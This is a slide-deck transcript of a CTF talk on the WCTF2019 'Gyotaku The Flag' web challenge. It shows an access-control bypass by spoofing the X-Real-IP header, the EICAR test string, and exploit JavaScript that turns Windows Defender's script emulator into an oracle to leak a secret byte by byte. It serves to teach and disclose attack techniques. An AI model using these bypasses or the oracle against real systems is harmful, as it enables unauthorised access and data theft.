wctf2019 gyotaku the flag
play

WCTF2019: Gyotaku The Flag icchy, TokyoWesterns Some thoughts about - PowerPoint PPT Presentation

Dec 20, 2022 •114 likes •441 views

WCTF2019: Gyotaku The Flag icchy, TokyoWesterns Some thoughts about challenge designing The best strategy for WCTF: make a super difficult challenge how? Multiple step (I did so far btw) 2017: 7dcs (PPC, Crypto, Web, Reverse,

  1. WCTF2019: Gyotaku The Flag icchy, TokyoWesterns

  2. Some thoughts about challenge designing The best strategy for WCTF: make a super difficult challenge ● how? ○ ● Multiple step (I did so far btw) 2017: 7dcs (PPC, Crypto, Web, Reverse, Pwn) → 0 solved ○ 2018: f (Forensics, Reverse, Web) → 1 solved ○ This year: "create simple but difficult, not typical challenge" ● less implementation with source code ○ ○ with new techniques

  3. About the challenge Simple web archive service ● "Gyotaku ( 魚拓 )" (Japanese) : an ink rubbing of a fish ● ○ like making a stamp of a web page at specific time You can query a URL to be archived by a crawler ● only local user (127.0.0.1) should be able to see the archive ○

  4. Gyotaku - login POST /login ● username ○ ○ password no login page implemented ●

  5. Gyotaku - take gyotaku POST /gyotaku ● url ○ ● saved as binary object (gob)

  6. Gyotaku - gyotaku list GET /gyotaku ● captured gyotaku id appears ○

  7. Gyotaku - gyotaku viewer GET /gyotaku/:gyotaku_id ● unimplemented ●

  8. Gyotaku - flag viewer GET /flag ● localhost only ○ ○ you can gyotaku flag page (but no viewer implemented) how to read flag without viewer? ●

  9. Gyotaku - flag viewer /flag is protected with InternalRequiredMiddleware ●

  10. Gyotaku - flag viewer InternalRequiredMiddleware checks the remote IP is localhost or not ●

  11. Solution echo.Context.RealIP is poisoned by "X-Real-IP" ● X-Real-IP: 127.0.0.1 ○ That's it ● This is sanity check ●

  12. Solution echo.Context.RealIP is poisoned by "X-Real-IP" ● X-Real-IP: 127.0.0.1 ○ That's it ● This is sanity check ● ● This is totally unintended solution sorry for verification lacking :( ○ 2017: 7dcs (Crypto, Web, Reverse, Pwn) → 0 solved ● ● 2018: f (Forensics, Reverse, Web) → 1 solved 2019: Gyotaku The Flag (Web, Misc) ● →

  13. Solution echo.Context.RealIP is poisoned by "X-Real-IP" ● X-Real-IP: 127.0.0.1 ○ That's it ● This is sanity check ● ● This is totally unintended solution sorry for verification lacking :( ○ 2017: 7dcs (Crypto, Web, Reverse, Pwn) → 0 solved ● ● 2018: f (Forensics, Reverse, Web) → 1 solved 2019: Gyotaku The Flag (Web, Misc) → everyone solved ●

  14. What is intended solution? no need to access /flag ● you could not access if it worked :( ○ can you get flag without special HTTP header? ● we did it! ○ I'd like to share this brand new technique ○

  15. Any designed vulnerability? (except for bypassing firewall! )

  16. Vulnerability? There is no XSS ● There is no SQL ● ● There is no command execution There is no SSRF ● There is no buffer overflow ● There is no LFI ● ● There is no HTML There is no … implementation ● ● 🤕

  17. No implementation, no bugs

  18. What else? Obviously it is running on Windows ● nmap the server ○ ○ … or see the scoreboard with default settings ● even security features are enabled by default ○ ○ Windows Defender is enabled as well

  19. What Windows Defender will do? As we investigated: ● 1. check the content of the file whether malicious data included 2. change permission to prevent user from accessing 3. replace malicious part with null bytes 4. (delete entire file) ● In step 2: the file obtained by SYSTEM ○ user cannot open the file ○

  20. How to abuse it? Do you remember "filemanager" challenge in 35c3ctf? ● abusing XSS auditor in Chrome is super cool idea ○ ● Basic idea [part of XSS payload] + [part of secret] → detected by auditor ○ auditor worked? → this is an oracle! ○ ● Why you don't use the method in Windows Defender? [part of malicious data] + [part of secret] → blocked! ○

  21. Let's make Windows Defender angry Where is malicious-ish payload? ● EICAR signature for testing is enough! ○ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-AN TIVIRUS-TEST-FILE!$H+H*

  22. About mpengine.dll Windows Defender Core DLL ● ● previous research about mpengine.dll Windows Offender: Reverse Engineering Windows Defender's Antivirus ○ Emulator by Alexei Bulazel at BHUSA 2018 ■ emulated Windows loadlibrary on Linux (github.com/taviso/loadlibrary) ○ by Tavis Ormandy ■ ● There are some analyzers for various contents base64 encoded ○ RAR archived ○ etc. ○

  23. JScript engine in mpengine.dll Basic features is implemented ● string, index access ○ ○ mathematical operators object ○ etc. ○ eval can be used ● eval("EICA"+"R") → detected ○ argument of eval will be audited ○ the idea: eval("EICA"+input) → ? ● detected → input is "R" ○ ○ not detected → input is not "R"

  24. Some issues in JScript engine if statement will never be evaluated ● if (true) {eval("EICA" + "R")} → not detected ○ object accessing will help you: {0: "a", 1: "b", ...}[input] ○ parser stops on null byte ● eval("EICA" + "[NULL]") → syntax error ○ ○ I'll explain in next slide

  25. Another feature in mpengine.dll They can analyze HTML document ● some html tags would be a trigger (ex. <script>) ○ ○ parser will not stop on null byte JavaScript can access the elements :) ● if they have <body> tag ○ ○ <script>document.body.innerHTML[0]</script><body>[secret]</body> Now you have an oracle! ●

  26. Think of Gyotaku format Standard struct encoded as gob ● URL, Data, UserName appears as declared ○ ...[URL]...[Data]...[UserName]... ● URL and UserName: controllable ○ Data: secret to be leaked ○

  27. Building exploit JavaScript ● $idx and $c would be iterated ○ var body = document.body.innerHTML; var mal = "EICA"; var n = body[$idx].charCodeAt(0); mal = mal + String.fromCharCode(n^$c); eval(mal); Windows Defender get angry if $c is appropriate ● It requires 256 times try for each $idx :( ●

  28. Building exploit much more faster! ● Math.min is also available, do binary search ○ var body = document.body.innerHTML; var mal = "EICA"; var n = body[$idx].charCodeAt(0); mal = mal + {$c: 'k'}[Math.min($c, n)]; eval(mal); $c < [input]: detected ● $c > [input]: not detected ● then do binary search! ○

  29. Building exploit Now everything is ready :) ● URL: http://127.0.0.1/flag?<script>...</script><body> ○ Data: [flag] ○ UserName: </body> ○ ...http://127.0.0.1/flag?<script>[script]</script><body>...[flag]...</body>... to get oracle: accessing /gyotaku/:gyotaku_id after querying the gyotaku ● ○ detected → Internal Server Error not detected → you can see the response ○

  30. Demo

  31. Conclusion I presented new Windows side challel attack ● content auditor can be an oracle - even Windows Defender! ○ It's easy to make Windows Defender angry ● this can be new type of attacks :) ○ ● Windows Defender will do too much things than we expected Microsoft should disable JavaScript engine? :) ○ We should be more careful about challenge verification ● ○ or you'll give 240 pts to every team

  32. Any questions? https://github.com/icchy/wctf2019-gtf @t0nk42 icchy

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Pride flags Sadie, Yael, &amp; Yossi Original Pride Flag Traditional Gay Pride Flag Philly

Pride flags Sadie, Yael, &amp; Yossi Original Pride Flag Traditional Gay Pride Flag Philly

Pride flags Sadie, Yael, &amp; Yossi Original Pride Flag Traditional Gay Pride Flag Philly Pride Flag Transgender Flag Progress Pride Flag Lesbian Flag Non-binary Flag Gender Fluidity flag Bisexual flag Pansexual Flag Asexual flag THANK

563 views • 13 slides
Flag Basics Agenda A1. The Pledge of Allegiance A2. The National Anthem A3. Flag

Flag Basics Agenda A1. The Pledge of Allegiance A2. The National Anthem A3. Flag

California Cadet Corps Curriculum on The Flag Flag Basics Agenda A1. The Pledge of Allegiance A2. The National Anthem A3. Flag Smarts A4. Folding the Flag A5. History of the Flag A6. Raising the Flag A7.

1.78k views • 158 slides
Flemish Aerospace Group (FLAG) Together for a stronger Flemish aviation industry FLAG Members

Flemish Aerospace Group (FLAG) Together for a stronger Flemish aviation industry FLAG Members

Flemish Aerospace Group (FLAG) Together for a stronger Flemish aviation industry FLAG Members FLAG Member Locations FLAG growth path FLAG ambition 2,5 2030: 2 Turnover + 100% 1,5 Employment + 50% 1 0,5 0 Turnover Employment 2016

498 views • 7 slides
The Flag Known as Big Red All of the evidence presented in this report is sourced, proven fact.

The Flag Known as Big Red All of the evidence presented in this report is sourced, proven fact.

The Flag Known as Big Red All of the evidence presented in this report is sourced, proven fact. The issues: 1. Is the Big Red flag in question the same flag that posted on Morris Island on 9 Jan 1861? 2. What is the link between Cpl Bakers

515 views • 22 slides
Memory Model COS 597C 10/5/2010 Example a = Flag = 0 Thread a = 26; Flag = 1; 2

Memory Model COS 597C 10/5/2010 Example a = Flag = 0 Thread a = 26; Flag = 1; 2

Memory Model COS 597C 10/5/2010 Example a = Flag = 0 Thread a = 26; Flag = 1; 2 Memory Model COS 597C, Fall 2010 Example a = Flag = 0 Thread a = 26; Flag = 1; Compiler Transformation Flag = 1; a =

1.09k views • 69 slides
FLAG-ERA Presentation FLAG-ERA JTC 2017 Project Kick-off Seminar March 21-22, 2018 Edouard

FLAG-ERA Presentation FLAG-ERA JTC 2017 Project Kick-off Seminar March 21-22, 2018 Edouard

Seminar Introduction FLAG-ERA Presentation FLAG-ERA JTC 2017 Project Kick-off Seminar March 21-22, 2018 Edouard Geoffrois, FLAG-ERA Coordinator French National Research Agency (ANR) edouard.geoffrois@agencerecherche.fr Supported by the

327 views • 22 slides
WEL ELS S Fl Flag Pre g Presen sentati tation Introduction to Flag Presentation The face of

WEL ELS S Fl Flag Pre g Presen sentati tation Introduction to Flag Presentation The face of

WEL ELS S Fl Flag Pre g Presen sentati tation Introduction to Flag Presentation The face of missions is changing, and the LWMS would like to reflect some of those changes in our presentation of flags . As women who have watched our sons and

245 views • 8 slides
Presenting the Flag Agenda B1. Color Guard B2. Taps B3. The California Flag

Presenting the Flag Agenda B1. Color Guard B2. Taps B3. The California Flag

California Cadet Corps Curriculum on The Flag Presenting the Flag Agenda B1. Color Guard B2. Taps B3. The California Flag COLOR GUARD B1a. Serve as a rifleman on a color guard B1b. Serve as a flag bearer on a color guard

391 views • 38 slides
AD Hoc Flag Etiquette Committee Our Assignment: - Review Our Tradition of Half-Staffing the

AD Hoc Flag Etiquette Committee Our Assignment: - Review Our Tradition of Half-Staffing the

AD Hoc Flag Etiquette Committee Our Assignment: - Review Our Tradition of Half-Staffing the American Flag Upon Death of a Member &amp; Proper Flag Etiquette Our Intent Today (Breakfast W/ Bridge): - Review What We Have Learned - Encourage

105 views • 9 slides
Iola Missionary Baptist Church Pledge to the American Flag I pledge allegiance to the flag of

Iola Missionary Baptist Church Pledge to the American Flag I pledge allegiance to the flag of

Iola Missionary Baptist Church Pledge to the American Flag I pledge allegiance to the flag of the United States of America, and to the republic for which it stands, one nation under God, indivisible, with liberty and justice for all. God

1.1k views • 71 slides
FLAG AND RULES WORKING TOGETHER Link Swanson | link@mustbuild.com FLAG MODULE

FLAG AND RULES WORKING TOGETHER Link Swanson | link@mustbuild.com FLAG MODULE

FLAG AND RULES WORKING TOGETHER Link Swanson | link@mustbuild.com FLAG MODULE drupal.org/project/flag RULES MODULE drupal.org/project/rules WARNING: I AM NOT AN EXPERT When it comes to Rules and Flag, my knowledge is just enough to be

527 views • 13 slides
Flag Algebras (hopefully simple basics) Bernard Lidick y University of Illinois at

Flag Algebras (hopefully simple basics) Bernard Lidick y University of Illinois at

Flag algebras First try for Mantel More automatic approach Additional constraints Flag Algebras (hopefully simple basics) Bernard Lidick y University of Illinois at Urbana-Champaign Apr 29, 2014 Flag algebras First try for Mantel More

1.25k views • 104 slides
DV FLAG East Why, What, How &amp; Development work A new project funded by 2020 Pip

DV FLAG East Why, What, How &amp; Development work A new project funded by 2020 Pip

DV FLAG East Why, What, How &amp; Development work A new project funded by 2020 Pip Salvador-Jones Chief officer at Citizens Advice Barking &amp; Dagenham Vice Chair of FLAG Steering Group Legal Aid Sentencing and Punishment of

359 views • 15 slides
Jewish Symbol? The Curious History of the Flag Declaration of the State of Israel 2 Herzl s

Jewish Symbol? The Curious History of the Flag Declaration of the State of Israel 2 Herzl s

Is The Israeli Flag a Jewish Symbol? The Curious History of the Flag Declaration of the State of Israel 2 Herzl s Vision for the Flag Herzl to Baron Hirsch, 1896 , ? ? !

456 views • 29 slides
FLAG-ERA Activities FET Flagship Board of Funders (BoF) meeting September 17 th , 2015 Edouard

FLAG-ERA Activities FET Flagship Board of Funders (BoF) meeting September 17 th , 2015 Edouard

FLAG-ERA Activities FET Flagship Board of Funders (BoF) meeting September 17 th , 2015 Edouard Geoffrois, FLAG-ERA Coordinator French National Research Agency (ANR) edouard.geoffrois@agencerecherche.fr Supported by the 17/09/2015 FLAG-ERA 2

367 views • 16 slides
Selected Pentium Instructions Chapter 12 S. Dandamudi Outline Status flags Conditional

Selected Pentium Instructions Chapter 12 S. Dandamudi Outline Status flags Conditional

Selected Pentium Instructions Chapter 12 S. Dandamudi Outline Status flags Conditional execution Zero flag Indirect jumps Carry flag Conditional jumps Overflow flag Single flags Sign flag Unsigned

1.18k views • 84 slides
Strategies for Bulk RNA-seq Analysis Genome Transcriptome Assembly Mapping Mapping Reads

Strategies for Bulk RNA-seq Analysis Genome Transcriptome Assembly Mapping Mapping Reads

Strategies for Bulk RNA-seq Analysis Genome Transcriptome Assembly Mapping Mapping Reads Reads Reads RSEM, Trinity, STAR, Kallisto, Scripture, HISAT2 Sailfish, Stringtie Salmon Splice-aware Transcript mapping Assembly into

622 views • 8 slides
RNA-seq Data Analysis Introduction to RNA-seq data analysis September, 2018 1 Guillermo Parada

RNA-seq Data Analysis Introduction to RNA-seq data analysis September, 2018 1 Guillermo Parada

RNA-seq Data Analysis Introduction to RNA-seq data analysis September, 2018 1 Guillermo Parada &lt; gp 7@ sanger.ac.uk &gt; Ashley Sawle &lt; Ashley.Sawle @ cruk.cam.ac.uk &gt; (Designed by Luigi Grassi &lt; lg 490@ medschl.cam.ac.uk &gt; )

447 views • 16 slides
Lei Tang, Yanjun Sun, Omer Gurewitz, and David B. Johnson Presentation at IEEE INFOCOM 2011,

Lei Tang, Yanjun Sun, Omer Gurewitz, and David B. Johnson Presentation at IEEE INFOCOM 2011,

PW-MAC: A Predictive-Wakeup MAC Protocol for Wireless Sensor Networks Lei Tang, Yanjun Sun, Omer Gurewitz, and David B. Johnson Presentation at IEEE INFOCOM 2011, April 2011 PW-MAC objectives Minimize energy consumption both at senders and at

709 views • 31 slides
Women in ICT and Newbie Night August 15 Introduction Statistics Who here is from some

Women in ICT and Newbie Night August 15 Introduction Statistics Who here is from some

Women in ICT and Newbie Night August 15 Introduction Statistics Who here is from some form of social media? Who here is a developer? Cyber Security FM (Women in ICT and Newbie Night) August 15 Cyber Governance, Risk

470 views • 17 slides
Unix: Beyond the Basics George W Bell, Ph.D. BaRC Hot Topics October, 2016 Bioinformatics

Unix: Beyond the Basics George W Bell, Ph.D. BaRC Hot Topics October, 2016 Bioinformatics

Unix: Beyond the Basics George W Bell, Ph.D. BaRC Hot Topics October, 2016 Bioinformatics and Research Computing Whitehead Institute http://barc.wi.mit.edu/hot_topics/ Logging in to our Unix server Our main server is called tak

442 views • 26 slides
UNIX Course Part II Working with files Andy Hauser LAFUGA &amp; Chair of Animal Breeding and

UNIX Course Part II Working with files Andy Hauser LAFUGA &amp; Chair of Animal Breeding and

UNIX Course Part II Working with files Andy Hauser LAFUGA &amp; Chair of Animal Breeding and Husbandry Gene Center Munich LMU June, 2016 1 Recall ls list file, information about files cd change working directory mkdir make directory

486 views • 23 slides
more accurate transcript assembly via parameter advising Dan DeBlasio dandeblasio.com @

more accurate transcript assembly via parameter advising Dan DeBlasio dandeblasio.com @

Toward building an automated bioinformatician: more accurate transcript assembly via parameter advising Dan DeBlasio dandeblasio.com @ danfdeblasio with Kwanho Kim and Carl Kingsford slides: dandeblasio.com/AutoAlg19 Modern science is

848 views • 42 slides
End-to-End Probabilistic Inference for Nonstationary Audio Analysis (or how to apply Spectral

End-to-End Probabilistic Inference for Nonstationary Audio Analysis (or how to apply Spectral

End-to-End Probabilistic Inference for Nonstationary Audio Analysis (or how to apply Spectral Mixture GPs to audio) William Wilkinson , Michael Riis Andersen, Josh Reiss, Dan Stowell, Arno Solin June 12, 2019 Queen Mary University of London /

518 views • 17 slides

More recommend